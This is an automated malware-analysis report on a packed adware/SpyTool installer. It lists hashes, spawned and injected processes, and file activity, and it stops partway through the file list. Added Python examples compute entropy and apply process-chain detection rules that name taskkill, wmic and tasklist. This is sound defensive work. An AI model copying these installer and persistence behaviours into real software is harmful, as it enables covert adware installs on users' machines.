not-a-virus:HEUR:AdWare.Win32.ConvertAd.heur (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, SpyTool, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 780fc5ed47f296c4e1b277c467eafa42
SHA1: 0a7431aeeda76cf17e302642f1a8c04ed91940b7
SHA256: 73924b8ea1cd3263d45f55622c9c4cca66cd9daebe7ce6f191cc606c0dcaa123
SSDeep: 6144:Ke34QY+TM7L+2aWM2jYMXz1gNSuw2GU/3HkL75+ZPPfnE2Qyn2FEtt2NB6+sO:ZYpMWMYXz1gtw23ELF+ZPPfnEUnsEWfb
Size: 309485 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: SpyTool. This is the generic description of the detection class rather than of this particular sample: a program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper. The dynamic analysis below records what this sample actually did when run.
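The "Entropy: Packed" field above is a static heuristic: compressed or encrypted payloads inside a wrapper look close to uniformly random, so their byte entropy approaches 8 bits per byte while plain code and strings sit well below that. The following is an added example of how such a verdict can be reproduced; it is not Lavasoft's code, the 7.0 bits/byte cut-off and the "at least half the windows" rule are assumptions, and the three buffers are constructed stand-ins, not the analysed sample.

```python
import math
import random
from collections import Counter

# Rule-of-thumb cut-off in bits per byte above which data looks compressed or
# encrypted. ASSUMPTION: a common heuristic, not Lavasoft's actual threshold.
PACKED_THRESHOLD = 7.0
WINDOW_SIZE = 4096


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty/uniform data, 8.0 maximum)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def windowed_entropy(data: bytes, window: int = WINDOW_SIZE) -> list:
    """Entropy of each non-overlapping window as (offset, entropy); the last window may be short."""
    return [(off, shannon_entropy(data[off:off + window])) for off in range(0, len(data), window)]


def classify(data: bytes, threshold: float = PACKED_THRESHOLD) -> dict:
    """Overall entropy, the hottest window, and a 'Packed' / 'Not packed' verdict.

    The verdict is 'Packed' when at least half of the windows exceed the threshold, so a
    small plaintext unpacking stub in front of a compressed payload still counts as packed.
    """
    windows = windowed_entropy(data)
    if not windows:
        return {"entropy": 0.0, "max_window": (0, 0.0), "packed_fraction": 0.0, "verdict": "Not packed"}
    hot = max(windows, key=lambda w: w[1])
    fraction = sum(1 for _, e in windows if e >= threshold) / len(windows)
    return {
        "entropy": shannon_entropy(data),
        "max_window": hot,
        "packed_fraction": fraction,
        "verdict": "Packed" if fraction >= 0.5 else "Not packed",
    }


# Constructed inputs (not the sample from the report): a low-entropy text-like buffer,
# a high-entropy pseudo-random buffer standing in for a compressed/encrypted payload,
# and a "wrapper" that glues a small plaintext stub in front of that payload.
_rng = random.Random(1)  # fixed seed so the result is reproducible
PLAIN_SAMPLE = b"This program cannot be run in DOS mode.\r\n" * 1600      # ~64 KiB of text
PACKED_SAMPLE = bytes(_rng.getrandbits(8) for _ in range(64 * 1024))    # 64 KiB pseudo-random
WRAPPED_SAMPLE = PLAIN_SAMPLE[:8192] + PACKED_SAMPLE                    # 8 KiB stub + payload


if __name__ == "__main__":
    for label, blob in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE), ("wrapped", WRAPPED_SAMPLE)):
        r = classify(blob)
        print(f"{label:8s} entropy={r['entropy']:.2f} hottest window @0x{r['max_window'][0]:x} "
              f"({r['max_window'][1]:.2f}) packed_fraction={r['packed_fraction']:.2f} -> {r['verdict']}")
```

Windowing matters more than the whole-file figure: a wrapper's own unpacking stub, resource section and import table drag the overall entropy down, and a single high-entropy window (for example an embedded certificate or image) should not by itself flag a file as packed.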
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The SpyTool creates the following process(es):
upgmsd_re_005010096.exe:1928
gmsd_re_005010096.exe:740
nsk15.tmp:1340
nsj35.tmp:588
8819.exe:368
nssF.tmp:1488
setup.exe:828
taskkill.exe:1408
taskkill.exe:248
taskkill.exe:1092
wmic.exe:1336
amisid.exe:496
amisid.exe:600
tasklist.exe:1852
tasklist.exe:492
nsr18.tmp:1388
nsr18.tmp:460
nsx27.tmp:1340
nsx27.tmp:336
encrypt.exe:1700
encrypt.exe:1364
encrypt.exe:1564
encrypt.exe:496
%original file name%.exe:860
nsd41.tmp:816
nsk6.tmp:496
nsqA.tmp:508
The SpyTool injects its code into the following process(es):
nsk3C.tmp:192
nsb2E.tmp:908
nsp45.tmp:596
nsr21.tmp:908
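The process list above is the signature of an NSIS installer chain: each stage extracts a plug-in or nested installer as ns<letter><hex>.tmp under the user's Temp directory, the stage nssF.tmp drops a numerically named 8819.exe, and nsr21.tmp runs taskkill.exe, wmic.exe and tasklist.exe to inspect and stop other software. The following is an added example of detection logic over such process-creation records; it is not Lavasoft's code. The PIDs and image names are taken from the report, but the parent links, full paths and the "sample.exe" stand-in for %original file name%.exe are assumptions, since the report does not record them.

```python
import re

# Constructed process-creation records (pid, ppid, image path), modelled on the
# report's process list. PIDs and image names come from the report; the parent
# links and full paths are an ASSUMPTION for this example.
PROCESS_EVENTS = [
    (860,  400,  r"C:\Documents and Settings\user\Desktop\sample.exe"),
    (1340, 860,  r"C:\Documents and Settings\user\Local Settings\Temp\nsk15.tmp"),
    (1488, 860,  r"C:\Documents and Settings\user\Local Settings\Temp\nssF.tmp"),
    (368,  1488, r"C:\Documents and Settings\user\Local Settings\Temp\8819.exe"),
    (828,  368,  r"C:\Documents and Settings\user\Local Settings\Temp\5517\setup.exe"),
    (908,  860,  r"C:\Documents and Settings\user\Local Settings\Temp\nsr21.tmp"),
    (1408, 908,  r"C:\WINDOWS\system32\taskkill.exe"),
    (1336, 908,  r"C:\WINDOWS\system32\wmic.exe"),
    (1852, 908,  r"C:\WINDOWS\system32\tasklist.exe"),
    (496,  908,  r"C:\Documents and Settings\user\Local Settings\Temp\nss25.tmp\amisid.exe"),
    # Benign noise (constructed): taskkill launched by Explorer must NOT trip the parent rule.
    (1234, 400,  r"C:\WINDOWS\explorer.exe"),
    (1256, 1234, r"C:\WINDOWS\system32\taskkill.exe"),
]

# NSIS names its extracted plug-in/temp executables "ns" + one letter + hex digits + ".tmp".
NSIS_TMP_RE = re.compile(r"^ns[a-z][0-9a-f]{1,4}\.tmp$", re.I)
TEMP_DIR_RE = re.compile(r"\\Local Settings\\Temp\\", re.I)
NUMERIC_EXE_RE = re.compile(r"^\d+\.exe$")
LOLBINS = {"taskkill.exe", "wmic.exe", "tasklist.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def analyze(events) -> list:
    """Apply three rules to process-creation records and return a list of findings."""
    image_by_pid = {pid: image for pid, _, image in events}
    findings = []
    for pid, ppid, image in events:
        name = basename(image)
        parent_name = basename(image_by_pid.get(ppid, ""))
        # R1: an NSIS-style temp executable running out of the user's Temp directory.
        if NSIS_TMP_RE.match(name) and TEMP_DIR_RE.search(image):
            findings.append({"rule": "R1-nsis-temp-exec", "pid": pid, "image": image})
        # R2: a living-off-the-land binary whose parent is such a temp executable.
        if name.lower() in LOLBINS and NSIS_TMP_RE.match(parent_name):
            findings.append({"rule": "R2-nsis-spawns-lolbin", "pid": pid, "image": image, "parent": parent_name})
        # R3: an executable with a purely numeric name dropped into Temp (e.g. 8819.exe).
        if NUMERIC_EXE_RE.match(name) and TEMP_DIR_RE.search(image):
            findings.append({"rule": "R3-numeric-exe-in-temp", "pid": pid, "image": image})
    return findings


def chain(events, pid: int) -> list:
    """Walk parent links upward from pid and return the image names root-first, for triage output."""
    image_by_pid = {p: image for p, _, image in events}
    ppid_by_pid = {p: pp for p, pp, _ in events}
    names, seen = [], set()
    while pid in image_by_pid and pid not in seen:   # stop at an unknown parent or a PID-reuse cycle
        seen.add(pid)
        names.append(basename(image_by_pid[pid]))
        pid = ppid_by_pid[pid]
    return list(reversed(names))


if __name__ == "__main__":
    for f in analyze(PROCESS_EVENTS):
        print(f"{f['rule']:24s} pid={f['pid']:<5d} {' -> '.join(chain(PROCESS_EVENTS, f['pid']))}")
```

R2 is the rule with the best signal-to-noise ratio: taskkill.exe and tasklist.exe are common in legitimate administration, but being spawned by a randomly named .tmp executable in the user's Temp directory is not. Note that the report reuses PID 496 for both amisid.exe and encrypt.exe, which is why the parent walk keeps a seen-set rather than trusting PIDs to be unique over the whole run.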
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process upgmsd_re_005010096.exe:1928 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)
The process nsk3C.tmp:192 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\SecondResult.txt (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer2.zip (392 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp (0 bytes)
The process gmsd_re_005010096.exe:740 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)
The process nsk15.tmp:1340 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr18.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp\inetc.dll (20 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp\inetc.dll (0 bytes)
The process nsj35.tmp:588 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3A.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj38.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj38.tmp (0 bytes)
The process nsb2E.tmp:908 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh33.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\BiTool[1].dll (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb32.tmp (108018 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (1557 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (4183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup[1].exe (28320 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb32.tmp (0 bytes)
The process 8819.exe:368 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gizmodo.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\search.ico (1917 bytes)
%WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job (1656 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\youtube.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\groupom.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_search.ico (5593 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\weather_channel.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\chrome.packed.7z (1342431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\prefs (823 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail.ru.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
The SpyTool deletes the following file(s):
%WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe (0 bytes)
The process nssF.tmp:1488 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\8819.exe (14988 bytes)
The process setup.exe:828 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
